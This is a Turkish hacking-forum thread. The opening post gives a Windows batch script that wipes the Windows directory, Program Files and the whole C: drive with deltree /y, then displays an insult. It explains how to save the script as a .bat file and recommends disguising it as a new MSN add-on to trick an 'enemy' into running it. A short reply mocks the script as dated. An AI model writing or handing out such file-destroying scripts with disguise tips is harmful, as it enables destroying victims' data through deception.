anında bilgisayar çökertme

tomamehmet

Yeni üye
12 Ağu 2011
37
0
33
her yerde
Açıklama Yapıyorum:

1.Notepad 'i açın.

2.Notepad in içine şu aşağıdaki kodları yazın:
Kaynak:
-----------------------------------------
@echo off

C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*

@echo off

C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*

@echo off

C:\WINDOWS\COMMAND\deltree /y c:\*.*

@echo off

cls

cls

@echo .:eni salak formatı yedin::.

@echo off
--------------------------------------------
3.Notepad i kapatıp belgeyi kaydedin.

4.Uzantısını .txt den .bat a çevirin.

5.Hazır:

Yaptıktan sonra dosyaya sakın tıklamayın sorumlu ben değilim.

Eğer tıklarsanız 2,3 sn saniye içinde bilgisayar kapanıyor. ve bi daha açılmayacak.

Not:%200

Windows un önemli bi kaç dosyasını siliyor ve sonra "seni salak formatı yedin yazıyor".

Peki bunu düşmanıma nasıl yediririm derseniz:

mesela yeni çıkmış bir msn eklentisi diyebilirsiniz başarılar

Assembly Program User's
GMail Op's User' s
Warez LiKe user's
Java op's User's
C# op's User's
Delphi User's

emeğe saygı beğenin

TheuLtra

Üye
21 Haz 2010
196
0
İyi Güzel kardeşim.. emeğe saygıda bu çok eskimedimi ya :) . Sence .bat virüslerini tanımayan antivirüs kaldımı? hadi kaldı diyelm..bu virüsleri yiyipde tıklayacak sazan kaldı mı ?

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.